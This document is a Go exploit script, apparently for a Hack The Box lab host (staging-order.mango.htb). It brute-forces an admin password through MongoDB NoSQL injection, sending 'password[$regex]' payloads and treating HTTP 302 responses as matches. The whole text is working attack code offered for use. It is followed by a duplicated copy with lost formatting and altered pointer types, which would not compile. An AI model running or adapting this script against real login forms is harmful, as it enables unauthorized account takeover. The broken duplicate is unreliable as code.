Bruteforce MongoDB Credentials with Regex Match Payload

## main.go
package main

import (
	"fmt"
	"net/http"
	"net/url"
	"strings"
)

// Build a rune slice of printable ASCII characters, excluding some special characters that would break the regex
func buildPrintable() []rune {
	var p []rune
	for i := '0'; i <= '9'; i++ {
		p = append(p, i)
	}
	for i := 'A'; i <= 'Z'; i++ {
		p = append(p, i)
	}
	for i := 'a'; i <= 'z'; i++ {
		p = append(p, i)
	}
	special := "~>][<>!@#%^()@_{}"
	for _, c := range special {
		p = append(p, c)
	}
	return p
}

// Post form data with URL-encoded payload
func makePostRequest(data string) int {
	u := "http://staging-order.mango.htb"

	req, err := http.NewRequest("POST", u, strings.NewReader(data))
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")

	client := &http.Client{
		// Prevent redirects
		CheckRedirect: func(req *http.Request, via []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
	resp, err := client.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	return resp.StatusCode
}

func buildPostData(victim, payload string) string {
	data := url.Values{}
	data.Set("username", victim)
	data.Set("password[$regex]", payload+".*")

	return data.Encode()
}

func main() {
	printable := buildPrintable()
	victim := "admin"
	fmt.Printf("[*] Bruteforcing password for: %s\n", victim)

	for _, a := range printable {
		flag := string(a)
		restart := true

		for restart {
			restart = false

			for _, c := range printable {
				payload := flag + string(c)
				data := buildPostData(victim, payload)

				statusCode := makePostRequest(data)

				if statusCode == 302 {
					fmt.Println(payload)
					flag = payload
					restart = true
				}
			}
		}
	}
}
	package main

	import (
	"fmt"
	"net/http"
	"net/url"
	"strings"
	)

	// Build a rune slice of printable ASCII characters, excluding some special characters that would break the regex
	func buildPrintable() []rune {
	var p []rune
	for i := '0'; i <= '9'; i++ {
	p = append(p, i)
	}
	for i := 'A'; i <= 'Z'; i++ {
	p = append(p, i)
	}
	for i := 'a'; i <= 'z'; i++ {
	p = append(p, i)
	}
	special := "~>][<>!@#%^()@_{}"
	for _, c := range special {
	p = append(p, c)
	}
	return p
	}

	// Post form data with URL-encoded payload
	func makePostRequest(data string) int {
	u := "http://staging-order.mango.htb"

	req, err := http.NewRequest("POST", u, strings.NewReader(data))
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")

	client := &http.Client{
	// Prevent redirects
	CheckRedirect: func(req http.Request, via []http.Request) error {
	return http.ErrUseLastResponse
	},
	}
	resp, err := client.Do(req)
	if err != nil {
	panic(err)
	}
	defer resp.Body.Close()

	return resp.StatusCode
	}

	func buildPostData(victim, payload string) string {
	data := url.Values{}
	data.Set("username", victim)
	data.Set("password[$regex]", payload+".*")

	return data.Encode()
	}

	func main() {
	printable := buildPrintable()
	victim := "admin"
	fmt.Printf("[*] Bruteforcing password for: %s\n", victim)

	for _, a := range printable {
	flag := string(a)
	restart := true

	for restart {
	restart = false

	for _, c := range printable {
	payload := flag + string(c)
	data := buildPostData(victim, payload)

	statusCode := makePostRequest(data)

	if statusCode == 302 {
	fmt.Println(payload)
	flag = payload
	restart = true
	}
	}
	}
	}
	}